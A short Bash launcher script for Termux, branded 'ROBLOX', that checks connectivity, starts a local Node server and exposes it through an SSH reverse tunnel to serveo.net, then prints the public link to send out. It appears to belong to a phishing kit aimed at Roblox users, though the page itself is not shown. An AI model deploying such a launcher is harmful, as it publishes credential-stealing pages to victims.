#!/bin/bash

# ─╔═══╗─╔═══╗─╔══╗──╔╗────╔═══╗─╔═╗╔═╗
# ─║╔═╗║─║╔═╗║─║╔╗║──║║────║╔═╗║─╚╗╚╝╔╝
# ─║╚═╝║─║║─║║─║╚╝╚╗─║║────║║─║║──╚╗╔╝─
# ─║╔╗╔╝─║║─║║─║╔═╗║─║║─╔╗─║║─║║──╔╝╚╗─
# ─║║║╚╗─║╚═╝║─║╚═╝║─║╚═╝║─║╚═╝║─╔╝╔╗╚╗
# ─╚╝╚═╝─╚═══╝─╚═══╝─╚═══╝─╚═══╝─╚═╝╚═╝
#   Start Script ==> Termux : bash start.sh

if [[ ! -d ".history" ]]; then
	mkdir -p ".history"
fi

if [[ -e ".server/.loclx" ]]; then
	rm -rf ".server/.loclx"

fi

if [[ -d ".server/.cld.log" ]]; then
	rm -rf ".server/.cld.log"    
fi
 printf "\e[1;92m"

 HOST="localhost"
 PORT="3000"

whoami=$(command whoami)
pwd=$(command pwd)
date_time=$(date "+%Y-%m-%d %H:%M:%S")


start(){
echo -e "\n\033[37m[::] Loading Program..."
timeout 3s curl -fIs "https://www.youtube.com/" > /dev/null
if [[ $? -eq 0 ]]; then
echo -e "\n\033[32mUser Conected!\033[37m"
echo -e "WELCOME!"
echo -e "Date : $date_time\nUser : $whoami"
start_serveo
else
sleep 0.74
echo -e ""
echo -e "\033[33mroblox \033[37mHello $whoami :)"
echo -e "\033[33mroblox \033[37mSoftware P 8080 $pwd"
echo -e "\033[33mroblox \033[37mstatus \033[31moff-line\033[37m..."
sleep 0.2
echo -e "\033[33mroblox \033[37mErro de Conexão| $date_time"
sleep 0.2
echo -e "\033[33mroblox \033[37mVerifique a sua rede wi-fi..."
start
fi
}

start_serveo() {
    sleep 0.75
    sleep 2
    echo ''
    if [[ -e server-roblox/linksender ]]; then
        rm -rf server-roblox/linksender
    fi
    $(which sh) -c 'ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:localhost:'$PORT' serveo.net 2> /dev/null > server-roblox/linksender ' &
    sleep 7
    send_url=$(grep -o "https://[0-9a-z]*\.serveo.net" server-roblox/linksender)
node index.js
    echo -e "${WHITE}[-] URL: ${GREEN} $send_url"
}

start;